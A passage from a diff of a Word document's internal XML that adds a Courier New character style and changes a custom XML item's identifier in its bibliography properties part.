+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A96692"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -13809,7 +15637,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E5BCF6B2-CD7F-4E7F-8D94-E9A5FFFE998F}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{74207A4F-5E7D-4B6B-9CBE-BA579975E5D0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
